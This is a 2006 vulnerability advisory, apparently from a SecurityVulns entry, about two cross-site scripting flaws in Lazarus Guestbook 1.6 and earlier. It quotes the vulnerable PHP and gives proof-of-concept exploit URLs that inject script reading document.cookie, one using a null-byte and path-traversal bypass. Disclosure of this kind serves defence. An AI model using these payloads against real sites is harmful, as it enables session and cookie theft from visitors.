Lazarus Guestbook Cross Site Scripting Vulnerabilities

2006-07-13T00:00:00
ID SECURITYVULNS:DOC:13510
Type securityvulns
Reporter Securityvulns
Modified 2006-07-13T00:00:00

Description

Produce : Lazarus Guestbook Website : http://carbonize.co.uk/Lazarus/ Version : <= 1.6 Problem : Cross Site Scripting

1) The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised This can be exploited to execute arbitrary HTML and javascript code

Vulnerable code in lang/codes-english.php near line 4

1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 2 <html> 3 <head> 4 <title><?php echo($_GET['show']); ?></title>

Exploit :

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS] http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>

2) the seconde probleme is in picture.php , the script verifiy fist if image file exists after it display it ,

vulnerable code : in picture.php


24 if (!empty($_GET['img'])) { 26 if (file_exists("$GB_TMP/$_GET[img]")) { 27 $size = @GetImageSize("$GB_TMP/$_GET[img]"); 28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]"; 29 } .. ............ 49 <td align="center" valign="middle"> 50 <?php 51 if (!empty($_GET['img']) && is_array($size)) { 52 echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n"; 53 } 54 ?> 55 </td>


if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file &#40; Exemple

: "img/home.gif") and using a nullchar ( %00 )

POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif&#37;00[code]

file_exists&#40;&quot;$GB_TMP/$_GET[img]&quot;&#41; will return true and html code will be executed

Exploit:

http://localhost/lazarusgb/picture.php?img=../img/home.gif&#37;00&#37;22&#37;3E[XSS]

http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>

Contact : simo64[at]gmail[dot]com Moroccan Security Research Team